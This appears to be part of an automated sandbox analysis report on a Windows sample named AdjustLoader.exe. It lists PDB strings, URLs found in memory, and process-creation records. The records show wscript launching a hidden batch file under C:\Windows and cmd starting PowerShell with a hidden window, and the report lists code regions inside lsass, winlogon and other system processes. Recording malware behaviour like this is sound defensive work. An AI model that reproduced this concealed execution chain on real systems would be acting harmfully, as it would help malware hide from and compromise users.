Source: |
Binary string: System.Configuration.Install.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Data.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.pdbp source: WER8844.tmp.dmp.11.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: C:\Users\admin\source\repos\Uni2\Uni2\obj\x64\Release\Uni2.pdb source: AdjustLoader.exe |
Source: |
Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Powershell.PSReadline.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.pdb source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Core.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Numerics.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.pdb source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.pdb4 source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: mscorlib.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.CSharp.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.pdb` source: WER8844.tmp.dmp.11.dr |
Source: |
Binary string: System.Configuration.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.pdbh source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Configuration.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Data.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Data.ni.pdbRSDSC source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.pdbjS source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Numerics.ni.pdbRSDSautg source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.CSharp.pdb%N source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Data.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: mscorlib.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.pdb3 source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: mscorlib.pdbPYW source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Core.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Transactions.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.pdbH source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Core.pdbiy source: WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Transactions.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr |
Source: |
Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Transactions.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0 |
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2 |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0? |
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0 |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0200000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 |
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512 |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0: |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0H |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.msocsp.com0 |
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy |
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/ |
Source: Amcache.hve.11.dr |
String found in binary or memory: http://upx.sf.net |
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://www.digicert.com/CPS0~ |
Source: powershell.exe, 00000012.00000002.2242069993.00000138702D0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000002F.00000002.2587997182.0000024D9FD4C000.00000004.00000020.00020000.00000000.sdmp, Null.39.dr, Null.8.dr |
String found in binary or memory: https://aka.ms/pscore6 |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000002E.00000002.2407283977.0000000004AC9000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004ADC000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBqq |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6xGa |
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/winsvr-2022-pshelp |
Source: powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX |
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000012.00000002.2020721365.0000013801152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D62A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\cmd.exe |
Code function: 1_3_00000208442DCDB8 |
1_3_00000208442DCDB8 |
Source: C:\Windows\System32\cmd.exe |
Code function: 1_3_00000208442D2398 |
1_3_00000208442D2398 |
Source: C:\Windows\System32\cmd.exe |
Code function: 1_3_00000208442DCC34 |
1_3_00000208442DCC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 2_3_0000020E8B1C2398 |
2_3_0000020E8B1C2398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 2_3_0000020E8B1CCC34 |
2_3_0000020E8B1CCC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 2_3_0000020E8B1CCDB8 |
2_3_0000020E8B1CCDB8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 18_2_00007FFD9B7D4070 |
18_2_00007FFD9B7D4070 |
Source: C:\Windows\System32\cmd.exe |
Code function: 21_3_000001CC9145CDB8 |
21_3_000001CC9145CDB8 |
Source: C:\Windows\System32\cmd.exe |
Code function: 21_3_000001CC91452398 |
21_3_000001CC91452398 |
Source: C:\Windows\System32\cmd.exe |
Code function: 21_3_000001CC9145CC34 |
21_3_000001CC9145CC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 22_3_00000261C3DCCDB8 |
22_3_00000261C3DCCDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 22_3_00000261C3DCCC34 |
22_3_00000261C3DCCC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 22_3_00000261C3DC2398 |
22_3_00000261C3DC2398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 27_3_000002220AB6CC34 |
27_3_000002220AB6CC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 27_3_000002220AB6CDB8 |
27_3_000002220AB6CDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 27_3_000002220AB62398 |
27_3_000002220AB62398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_3_0000024D9FF4CC34 |
47_3_0000024D9FF4CC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_3_0000024D9FF42398 |
47_3_0000024D9FF42398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_3_0000024D9FF4CDB8 |
47_3_0000024D9FF4CDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_2_0000024D9FF7D834 |
47_2_0000024D9FF7D834 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_2_0000024D9FF72F98 |
47_2_0000024D9FF72F98 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_2_0000024D9FF7D9B8 |
47_2_0000024D9FF7D9B8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 54_3_00000123B852CDB8 |
54_3_00000123B852CDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 54_3_00000123B8522398 |
54_3_00000123B8522398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 54_3_00000123B852CC34 |
54_3_00000123B852CC34 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 55_3_0000021A20192398 |
55_3_0000021A20192398 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 55_3_0000021A2019CC34 |
55_3_0000021A2019CC34 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 55_3_0000021A2019CDB8 |
55_3_0000021A2019CDB8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC64CDB8 |
56_3_00000225DC64CDB8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC642398 |
56_3_00000225DC642398 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC64CC34 |
56_3_00000225DC64CC34 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC61CDB8 |
56_3_00000225DC61CDB8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC612398 |
56_3_00000225DC612398 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC61CC34 |
56_3_00000225DC61CC34 |
Source: C:\Windows\System32\lsass.exe |
Code function: 57_3_00000202C0AE2398 |
57_3_00000202C0AE2398 |
Source: C:\Windows\System32\lsass.exe |
Code function: 57_3_00000202C0AECC34 |
57_3_00000202C0AECC34 |
Source: C:\Windows\System32\lsass.exe |
Code function: 57_3_00000202C0AECDB8 |
57_3_00000202C0AECDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 58_3_000002A661302398 |
58_3_000002A661302398 |
Source: C:\Windows\System32\svchost.exe |
Code function: 58_3_000002A66130CDB8 |
58_3_000002A66130CDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 58_3_000002A66130CC34 |
58_3_000002A66130CC34 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF23CDB8 |
59_3_000002BAAF23CDB8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF232398 |
59_3_000002BAAF232398 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF23CC34 |
59_3_000002BAAF23CC34 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF1ACDB8 |
59_3_000002BAAF1ACDB8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF1A2398 |
59_3_000002BAAF1A2398 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF1ACC34 |
59_3_000002BAAF1ACC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 60_3_0000026A8799CC34 |
60_3_0000026A8799CC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 60_3_0000026A87992398 |
60_3_0000026A87992398 |
Source: C:\Windows\System32\svchost.exe |
Code function: 60_3_0000026A8799CDB8 |
60_3_0000026A8799CDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 61_3_000001795377CDB8 |
61_3_000001795377CDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 61_3_0000017953772398 |
61_3_0000017953772398 |
Source: C:\Windows\System32\svchost.exe |
Code function: 61_3_000001795377CC34 |
61_3_000001795377CC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 62_3_000002295D53CDB8 |
62_3_000002295D53CDB8 |
Source: C:\Windows\System32\svchost.exe |
